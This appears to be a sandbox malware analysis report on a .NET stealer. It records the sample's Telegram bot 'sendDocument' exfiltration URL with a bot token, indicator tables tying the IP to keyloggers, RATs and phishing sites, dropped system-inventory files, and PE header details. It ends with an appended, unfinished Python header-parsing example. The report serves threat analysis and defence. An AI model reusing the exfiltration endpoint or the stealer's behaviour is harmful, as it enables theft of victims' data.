https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentapi.telegram. | curl.exe, 00000003.00000003.1792902079.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792770937.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792789597.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
IP
127.0.0.1
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1502365
          Start date and time:2024-09-01 01:08:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 3m 8s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:n0PDCyrFnf.exe
          renamed because original name is a hash value
          Original Sample Name:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@7/13@2/2
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target n0PDCyrFnf.exe, PID 2588 because it is empty
• Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:08:55 | API Interceptor | 43x Sleep call for process: n0PDCyrFnf.exe modified
19:08:57 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | client2.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer
149.154.167.220 | https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html | malicious | Unknown
149.154.167.220 | LEK1JCI81P.exe | malicious | RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm
149.154.167.220 | Invoice-2238562.pdf.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | INQUIRY.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | SWIFT COPIES.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
149.154.167.220 | Client.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer
149.154.167.220 | i3F8zuP3u9.exe | malicious | DCRat, PureLog Stealer, zgRAT
149.154.167.220 | Detailed Itinerary.exe | malicious | PureLog Stealer, XWorm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | client2.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html | malicious | Unknown | 149.154.167.220
api.telegram.org | LEK1JCI81P.exe | malicious | RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm | 149.154.167.220
api.telegram.org | Invoice-2238562.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | INQUIRY.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | SWIFT COPIES.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Client.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | i3F8zuP3u9.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | Detailed Itinerary.exe | malicious | PureLog Stealer, XWorm | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | client2.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
TELEGRAMRU | https://telegrern.icu/?8a18ab92c44a9607e8cddc31d16d5729 | malicious | Telegram Phisher | 149.154.167.99
TELEGRAMRU | https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html | malicious | Unknown | 149.154.167.220
TELEGRAMRU | LEK1JCI81P.exe | malicious | RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm | 149.154.167.220
TELEGRAMRU | d3d9x.dll | malicious | Xehook Stealer | 149.154.167.99
TELEGRAMRU | 400000.MSBuild.exe | malicious | Xehook Stealer | 149.154.167.99
TELEGRAMRU | 400000.MSBuild.exe | malicious | Xehook Stealer | 149.154.167.99
TELEGRAMRU | Invoice-2238562.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | INQUIRY.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
74954a0c86284d0d6e1c4efefe92b521 | SecuriteInfo.com.Trojan.Win64.Krypt.13435.32435.exe | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | slmgr.vbs | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | scan_9374673_Medoc.pdf.exe | malicious | DBatLoader, TVrat | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | scan_9374673_Medoc.pdf.exe | malicious | DBatLoader, TVrat | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | i.bat | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | Archive.zip | malicious | Gandcrab | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | attachment.txt.lnk | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | Doc1.docm | malicious | Python Stealer | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | YENB0G9CNCEL.bat | malicious | AsyncRAT, DcRat | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | Eksik#U0130slemBildirimi.bat | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://uppholldlgins.mystrikingly.com/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://www.chacararecantodosol.com.br/wp-admin/js/milissa/swisssa2024/swisscom/index2.php | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/ | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://alfdmy-acc.click/icloud2022-esp.php/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://multicoinsystemnode.firebaseapp.com/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://66d2795a9886f088ed2f8c66--loquacious-pixie-9e563f.netlify.app/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://wh-whatsapp.icu/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://axn-one.vercel.app/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://www.tiktw.com/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://i-claim7.vercel.app/ | malicious | Unknown | 149.154.167.220
                              No context
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):5252
                              Entropy (8bit):5.360852309168774
                              Encrypted:false
                              SSDEEP:96:iqbYqGSI6ozajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqWiNLWPzNW:iqbYqGcRIzQ0JyZtzHeqKkCq10tpDuqi
                              MD5:E713B4067A4128844D005C0A2D8B8867
                              SHA1:57D0A72A1614181105A33B18DE7A3AB8F136B1A0
                              SHA-256:C3619BC0C9DA8421B80D4E97FBCFAB173FEBF2F555F459715761A1BCEFE7C51D
                              SHA-512:467543C956DB8F89FCBB2F4A76D87018635B16B1A576453FF528D8B2341A4044F86EEBB0DF4169E0454F7FCDCD8843FB256ACEB4522974F18D7D2ED868E8EC92
                              Malicious:true
                              Reputation:low
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\37a5ed6e6a6a48d370ee34b13c3e2b37\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):9170
                              Entropy (8bit):7.888394580457143
                              Encrypted:false
                              SSDEEP:192:ghk7p49wRsOYwUCQYuH08JFCAgo2WWBhKXXyLLtvlPnQgsQFS:ghk7pgc7iLYujHCRDPKMtJQrZ
                              MD5:27F4E493ECDCC358F1A540B86AEBD0F3
                              SHA1:7D1726E3FC3A10291EC27C3CBE67B951B7AA5D71
                              SHA-256:4A82BB35D4A7664FA0EF0002B097FC0F6CAD6FF4AE4785C0E296E06B78A42FC9
                              SHA-512:ED1587F11ADEAA2753099E32CD94D091C47A53154B8AAAC72E456D5888000BDB0CB9BB9E014EA86ECB8878F18E9885B4FFC3F06334B471FA8823E681EC93946B
                              Malicious:false
                              Preview:PK........!..Y..5$.....!......database\DLLs_in_memory.txt.Y.r.J...}.T.f.bU3....;....c....)UQ.Q.+.......^.#.+l...m.. g.e.............O..`P...doN...7..+.....x...........l.........yzs3.|..$...]..\...~....b...`.O?\..a.}m..N..]86._?...N.....9..o....[.U..o..8...EQ.W.......".......[SB.......na^;Q...t}..=...EtW...^......]Is..=..u....v.!40Y.t......i*.v.`.......ib...i..&.~...U....U..&-..C..W.........~w...c8..k@.:)..U...#!.u.&K.q..f..`.a..j..E^.E....*).I...'.z.u.;...c8xQ.[..#-6:7.8.o.Ej_..?._.A......1.W.w.YU........J...9x.~\...z..?E...H.M.mP....{..:.bVa.nx.w..9..=8.8.fEy.0..X.Wr.9d4.|4R3.[.n..p.....$,M...']'.l.Lm....22..O.]....i...)w...N.-WG...!..E.&a..L.sv....d..N....Y5.....Q...q)..{7..i..C..E.#JuCF.s^I.G....d.$...N.'s......<.....=....>.92!E..VpVX..C.&..~...t.>...P..v....b..d.i/..<~.....T.da..VE.....F.M&..z..w...$.<eN.......27. B.(pm....x.Z.....<....S[Oq...?*.=.......@r.,...66..n.g.a...:$;.u..<c5..$..Xni(@..~...Jq-#M#....j'Y;.R...}.PI.51."J.A...a.
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8605
                              Entropy (8bit):5.456254145784573
                              Encrypted:false
                              SSDEEP:192:Z7i4olBumXQ0sHbc/XpHk1+66WYhtrgpa/ElHLEpDPM:U3BJXQ0sHbc/XpEA9dDPM
                              MD5:E2A7D9C11D0F98D8D1C50E9435CBD602
                              SHA1:D38BF8ED3C5B77DACA107C9BB7D7DA18062CFDE3
                              SHA-256:8669C6ED6D515A28D7324DD446E2F500A8FC9BE06889F2B05144FC88E5AD257A
                              SHA-512:FCEEABD40271C81CD38909536F5DB26BBB52BA5B9247454329AE29304612681DD654A19E1966FD53649AD8ACD17D21742D175D59E4BC89ACFF0E005275516484
                              Malicious:false
                              Preview:.C:\Program Files (x86)\kRguKqyYZYYjhKvuEmxiGSRqKcMNTnlYYxDqUPiEDuHsjaWMmbcjzlheyTAdPQeyfuQUJQxAwzC\IDABkbgaFzQFTLFSnWHp.exe..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSVCP140.dll..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140.dll..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140_1.dll..C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll..C:\Program Files\Co
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):562
                              Entropy (8bit):4.403075456536458
                              Encrypted:false
                              SSDEEP:12:tE8EpIbzq1BvY0sF9VM32XM3vKJmpI1CgnzY8P32Xt:feIbzq1JY0snVM32XhuIcgzY632Xt
                              MD5:A445EBEFFA955C3AA1DB879E39006161
                              SHA1:90569BD68F304E84961B7E3B5E37013036BCA366
                              SHA-256:6A9EFE73C7ECCD1EC26BA81F15130100FB1B9FDA36E5EC87C70E71C6CC50ED82
                              SHA-512:7943F3C6C6BD307A0B33A6D21C94520520BE4DBE817069D5ACC4236195404BE7BBD492DAB3E9A8BF7EAAE158FFAAA338D803E7154625FA1AE4E1A560F404A0D3
                              Malicious:false
                              Preview:...----------------------------------------..HKLM KEYS..----------------------------------------..7-Zip..Adobe..Clients..CVSM..DefaultUserEnvironment..Google..Intel..Microsoft..Mozilla..mozilla.org..MozillaPlugins..ODBC..OEM..OpenSSH..Partner..Policies..RegisteredApplications..Windows..WOW6432Node....----------------------------------------..HKCU KEYS..----------------------------------------..7-Zip..Adobe..AppDataLow..Chromium..DownloadManager..GNU..Google..IM Providers..Microsoft..Mozilla..Netscape..ODBC..Policies..RegisteredApplications..Wow6432Node..
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):112254
                              Entropy (8bit):2.6155817173904254
                              Encrypted:false
                              SSDEEP:192:wKpFFULMaD4WTG9+PTCIo9/k/sFwz3J9xOfvcvYIRsONLF5PlLmcGHLJzfeUdQhW:wKpFFUMt
                              MD5:9E82EBECCB2828348BA267FBF596CE45
                              SHA1:CD979437908ABBE0D7315ACEC234E0BC6C73911E
                              SHA-256:195054848477BA1533DE19C0F84E2DBEF19BA8206A79A9B546BC24059C05820F
                              SHA-512:96EBE18285AE1C283AC1FDE873316481C3364860FEFAB62179B0C6062038F0A8601277F1795DC851FEC13543FD990BEEEB1CFA6584103D4403EEC7AC05E07194
                              Malicious:false
Preview (decoded from UTF-16LE):
Name                     Description              ProcessId ThreadCount Handles Path
----                     -----------              --------- ----------- ------- ----
System Idle Process      System Idle Process              0           2       0
System                   System                           4         155    3180
Registry
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):27830
                              Entropy (8bit):2.6278553414981185
                              Encrypted:false
                              SSDEEP:96:wZ5Dvpz93n/Gt6zMRTH1EU3MZuGbYgHRZFG7RwDLD3R7+M7E3Olw2xmAP3b79gHy:wbCOyTihHbZow/d9Dwbk2RCtz9vbx
                              MD5:1BCF4D65689D48623E3478E42EEB39AE
                              SHA1:B55DF6B67B15BDA86EFE4B66458BC4DA51C775A7
                              SHA-256:D0E354616A467D151AAC3E78375B801E4169753D780D6F0DEBEC001EA815A451
                              SHA-512:86365D0807A437D4FC2AF8839ABA81C654DCA34FED0D042B2780A2AC2A5B3FAC91ED30DE09B517BED716A4E5E71ACB913A4D8FAC998AD5F58B665DCB8AF6DC25
                              Malicious:false
Preview (decoded from UTF-16LE):
Name                DisplayName                             PathName
----                -----------                             --------
Appinfo             Application Information                 C:\Windows\system32\svchost.exe -k netsvcs -p
AppXSvc             AppX Deployment Service (AppXSVC)       C:\Windows\system32\svchost.exe -k wsappx -p
AudioEndp
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16
                              Entropy (8bit):2.771782221599798
                              Encrypted:false
                              SSDEEP:3:QPQlSLlvl:QIql9
                              MD5:0DB133DF4C9709771A05F0E38D3611A3
                              SHA1:710AA2FFE016FF1466BC38327BC6A34BECDE2296
                              SHA-256:C46346422C83B8FD2CD54FEAAA4049AFB67BAA3756F9C75D5F6048FB4A6B2AE8
                              SHA-512:E9306FF84570B5A912522BD2C88CC61B54C1EDEA600FA840F86FC61C74BC5EC7DF04C35A2A597CC0971D9981F8C05F20F99295E75423374E70154A9D9456BDF9
                              Malicious:false
Preview (decoded from UTF-16LE): jones
                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.350617040103966
                              TrID:
                              • Win64 Executable GUI (202006/5) 92.65%
                              • Win64 Executable (generic) (12005/4) 5.51%
                              • Generic Win/DOS Executable (2004/3) 0.92%
                              • DOS Executable Generic (2002/1) 0.92%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:n0PDCyrFnf.exe
                              File size:367'616 bytes
                              MD5:88e5d9d97d0e3c83e74926986d6e5ef6
                              SHA1:37c8bcfde800dea135577b3254b11c6fe639dc21
                              SHA256:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279
                              SHA512:e4756404059c4daf2e287baa18b81564f5d616fe13e646109a40d7c3a66c11016174dd39a0639d7656e3beb8c4e9de4ab1cde77c470bed873bdd09b979943ece
                              SSDEEP:6144:+3AtVSBNhoeDUrsi+VmwnJ5D/ArmtPk8Rs9LzIPZ3CpUiS:+QL8LoTrsLFnJ5DY8by5zE3Cy
                              TLSH:9C749E99B2908F40C3983E71D0A3456953A1A4AB73B7FB4D2ED822956D077F88D4E3C7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...M..f................................. ....@...... ....................................@...@......@............... .....
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0x400000
                              Entrypoint Section:
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66D3A04D [Sat Aug 31 22:59:25 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:
Instruction (disassembly at the reported entrypoint 0x400000; caveat: the entrypoint equals the image base, i.e. AddressOfEntryPoint is 0 and falls in no section, so these are the DOS header bytes 4D 5A 90 00 03 00 00 00 04 00 00 00 ("MZ...") decoded as x86, not code the sample executes. A managed PE32+ with an empty import table is entered by the CLR through IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at 0x2000 in .text, so the real entry is the managed Main, not a native stub)
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5c000 | 0x10 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x59680 | 0x59800 | cc72d35ce199acefeeacf464acf3d2bb | False | 0.7446834628142458 | data | 7.361258356562657 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x5c000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
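The header fields above (entrypoint equal to the image base, no entrypoint section, empty import and IAT directories, a CLR header inside .text) are what distinguish a managed-only PE32+ from a native executable, and they are the reason the entrypoint disassembly should not be read as code. The following is an added example, not Joe Sandbox or sample code: it builds a constructed header-only PE32+ image carrying the values the report lists for n0PDCyrFnf.exe (ImageBase 0x400000, entry RVA 0, CLR header at 0x2000 in .text, .rsrc at 0x5c000) and parses it with the standard library to derive those facts. Fields the report does not show (e_lfanew, linker version, alignments, stack and heap sizes) are placeholders.

```python
"""Classify a PE32+ image from its headers: managed or native, and where the entry point lies.

Added example for this report (not Joe Sandbox code). build_constructed_pe64()
fabricates a header-only PE32+ image carrying the values the report lists for
n0PDCyrFnf.exe (ImageBase 0x400000, entry point RVA 0, empty import directory,
CLR header at RVA 0x2000 in .text, .rsrc at 0x5c000); header fields the report
does not show (e_lfanew, linker version, alignments, stack/heap sizes) are
placeholders. Standard library only.
"""
import struct

E_LFANEW = 0x80                  # constructed offset of the "PE\0\0" signature
DIR_IMPORT, DIR_RESOURCE, DIR_CLR = 1, 2, 14
SECTION_FMT = "<8sIIIIIIHHI"     # IMAGE_SECTION_HEADER, 40 bytes


def build_constructed_pe64(entry_rva=0, import_dir=(0, 0), clr_dir=(0x2000, 0x48)):
    """Return DOS header + COFF header + optional header + two section headers."""
    dos = bytearray(E_LFANEW)
    dos[0:12] = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"  # the bytes the report disassembles
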